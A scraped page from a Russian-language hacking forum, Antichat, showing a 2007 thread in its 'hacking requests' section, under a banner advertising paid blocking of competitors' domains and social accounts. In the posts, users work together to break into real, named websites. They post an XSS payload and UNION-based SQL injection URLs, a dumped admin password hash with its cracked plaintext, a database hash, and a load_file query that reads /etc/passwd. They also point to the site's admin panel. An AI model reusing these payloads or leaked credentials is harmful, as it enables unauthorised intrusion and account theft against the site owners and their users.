УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Помощь Sql Иньекции.

Страница 10 из 41

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#91

04.11.2007, 19:38

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

Цитата:

Сообщение от edos

_http://www.plpm.ru/catalogue.php?type=361'

что можно сделать, что-то не допру ?

ыыы веселье))
http://www.plpm.ru/catalogue.php?type=361%3Cscript%3Ealert('hi')%3C/script%3E

#92

06.11.2007, 00:48

Sokoloff

Новичок

Регистрация: 05.11.2007

Сообщений: 1

Провел на форуме:
31893

Репутация: 0

Есть ли тут скл-инъекция?
http://www.selfserviceworld.com/research.php?rc_id='

#93

06.11.2007, 01:25

min7

Участник форума

Регистрация: 03.09.2005

Сообщений: 123

Провел на форуме:
1896022

Репутация: 259

Цитата:

Сообщение от Sokoloff

Есть ли тут скл-инъекция?
http://www.selfserviceworld.com/research.php?rc_id='

Есть, для начала

Код:

http://www.selfserviceworld.com/research.php?rc_id=-309+union+select+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8/*

atmmarketplace@localhost/sitedb/5.0.22

Код:

http://www.selfserviceworld.com/research.php?rc_id=-309+union+select+name,2,password,4,5,6,7,8+from+users/*

admin:dbcc4a47bc32b0e84903c632fb0dc08c
Осталось только расшифровать хеш админа)

Последний раз редактировалось min7; 06.11.2007 в 02:20..

#94

06.11.2007, 02:45

Sokoloff

Новичок

Регистрация: 05.11.2007

Сообщений: 1

Провел на форуме:
31893

Репутация: 0

min7,
я хэш мускла нашёл )
atmmarketplace:54a43983056d0aa5

Цитата:

admin:dbcc4a47bc32b0e84903c632fb0dc08c

а каким образом можно узнать ссылку на админку? ) robots.txt отстуствует.
Если есть возможность, оставь аську плиз, есть пара вопросов )

Сорри за оффтоп

Последний раз редактировалось Sokoloff; 06.11.2007 в 02:50..

#95

06.11.2007, 09:47

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

Цитата:

Сообщение от Sokoloff

min7,
я хэш мускла нашёл )
atmmarketplace:54a43983056d0aa5

а каким образом можно узнать ссылку на админку? ) robots.txt отстуствует.
Если есть возможность, оставь аську плиз, есть пара вопросов )

Сорри за оффтоп

по поводу поиска директорий лучше всего пользоваться сканерами /я работаю с пакетом nikto/, хотя 90% можно найти и руками вариантов не так много.

теперь по поводу сайта выше - админка сдесь http://www.selfserviceworld.com/admin но пароль из хеша не подходит/ dbcc4a47bc32b0e84903c632fb0dc08c:lackawanna/

советую пойти таким путём, там есть возвожность читать произвольные вайлы http://www.selfserviceworld.com/research.php?rc_id=-309+union+select+load_file(0x2f6574632f706173737764),2,password,4,5,6,7,8+from+users/* где load_file(_полный_путь_к_файлу_)
попробуй подобрать путь к сайту, потом просмотри файл .htaccess, ещё путь к вайлу пароля может буть в конфиге апача httpd.conf, ну и последний вириант, скринт_auth_.php в папке admin
/давно я столько не писал)))/
удачи

Последний раз редактировалось big_BRAT; 06.11.2007 в 09:50..